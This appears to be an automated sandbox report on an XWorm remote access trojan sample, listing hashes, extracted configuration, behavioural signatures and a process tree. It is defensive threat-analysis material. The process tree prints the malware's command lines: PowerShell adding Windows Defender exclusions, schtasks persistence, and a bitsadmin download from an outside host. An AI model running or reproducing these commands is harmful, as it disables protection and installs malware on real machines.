Analysis

  • max time kernel
    37s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-01-2025 03:49

Errors

Reason
Machine shutdown

General

  • Target

    PhantomCrypter.exe

  • Size

    5.0MB

  • MD5

    d4d28f2c6fd9af9ee5a3be30f9ab913b

  • SHA1

    be4264bceaff957ff799b73ebc2479f0fc794815

  • SHA256

    c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

  • SHA512

    7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

  • SSDEEP

    98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

EEarXqazEvX73BCq

Attributes
  • Install_directory

    %AppData%

  • install_file

    Chrome Update.exe

  • pastebin_url

    https://pastebin.com/raw/RPPi3ByL

aes.plain

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Drops startup file 6 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 25 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
      "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1296
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2992
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:2672
    • C:\Users\Admin\AppData\Roaming\msedge.exe
      "C:\Users\Admin\AppData\Roaming\msedge.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2624
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1704
    • C:\Users\Admin\AppData\Roaming\OneDrive.exe
      "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:304
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2308
    • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
      "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2688
      • C:\Windows\SysWOW64\shutdown.exe
        "C:\Windows\System32\shutdown.exe" -r -t 00
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
    PID:1248
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x1
    1⤵
    PID:1068

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Roaming\Chrome Update.exe

        Filesize

        152KB

        MD5

        16cdd301591c6af35a03cd18caee2e59

        SHA1

        92c6575b57eac309c8664d4ac76d87f2906e8ef3

        SHA256

        11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

        SHA512

        a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

      • C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

        Filesize

        844B

        MD5

        3f8a283abe6fe28a7d217c8105041426

        SHA1

        0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

        SHA256

        333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

        SHA512

        bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        8cfe4aa907a50b307b0d5781ebc601d2

        SHA1

        feb6ff210864853f60c4341436fbee2f092df1ee

        SHA256

        3d843d4bee9fba24d59a708805f8fef16ee10eb712e0f3136d83f87196a8bc96

        SHA512

        412bc07488897e8064215f92ef812272d9579522afd02a04d9cbdd42dfeaa0754d3a433a1618294e414fc26766faa696e05e154df3be236fa2e73064d031e1c3

      • C:\Users\Admin\AppData\Roaming\OneDrive.exe

        Filesize

        140KB

        MD5

        a1cd6f4a3a37ed83515aa4752f98eb1d

        SHA1

        7f787c8d72787d8d130b4788b006b799167d1802

        SHA256

        5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

        SHA512

        9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

      • C:\Users\Admin\AppData\Roaming\TOPHERC.exe

        Filesize

        4.2MB

        MD5

        79f2fd33a188ff47216b4f4dd4552582

        SHA1

        16e40e0a1fed903fec20cd6cd600e3a2548881ad

        SHA256

        cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

        SHA512

        caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

      • C:\Users\Admin\AppData\Roaming\msedge.exe

        Filesize

        166KB

        MD5

        aee20d80f94ae0885bb2cabadb78efc9

        SHA1

        1e82eba032fcb0b89e1fdf937a79133a5057d0a1

        SHA256

        498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

        SHA512

        3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

      • memory/1720-111-0x0000000001EB0000-0x0000000001EB8000-memory.dmp

        Filesize

        32KB

      • memory/1720-110-0x000000001B690000-0x000000001B972000-memory.dmp

        Filesize

        2.9MB

      • memory/1972-71-0x0000000001E00000-0x0000000001E08000-memory.dmp

        Filesize

        32KB

      • memory/1972-70-0x000000001B640000-0x000000001B922000-memory.dmp

        Filesize

        2.9MB

      • memory/2160-22-0x0000000000190000-0x00000000001B8000-memory.dmp

        Filesize

        160KB

      • memory/2472-9-0x0000000000AF0000-0x0000000000B1C000-memory.dmp

        Filesize

        176KB

      • memory/2472-123-0x000007FEF5CD0000-0x000007FEF66BC000-memory.dmp

        Filesize

        9.9MB

      • memory/2472-30-0x000007FEF5CD0000-0x000007FEF66BC000-memory.dmp

        Filesize

        9.9MB

      • memory/2472-122-0x000007FEF5CD0000-0x000007FEF66BC000-memory.dmp

        Filesize

        9.9MB

      • memory/2504-21-0x0000000000E70000-0x0000000000E9E000-memory.dmp

        Filesize

        184KB

      • memory/2596-35-0x000000001B660000-0x000000001B942000-memory.dmp

        Filesize

        2.9MB

      • memory/2596-41-0x0000000001E90000-0x0000000001E98000-memory.dmp

        Filesize

        32KB

      • memory/2688-29-0x00000000013B0000-0x00000000017E8000-memory.dmp

        Filesize

        4.2MB

      • memory/2980-0-0x000007FEF5CD3000-0x000007FEF5CD4000-memory.dmp

        Filesize

        4KB

      • memory/2980-1-0x00000000002E0000-0x00000000007E8000-memory.dmp

        Filesize

        5.0MB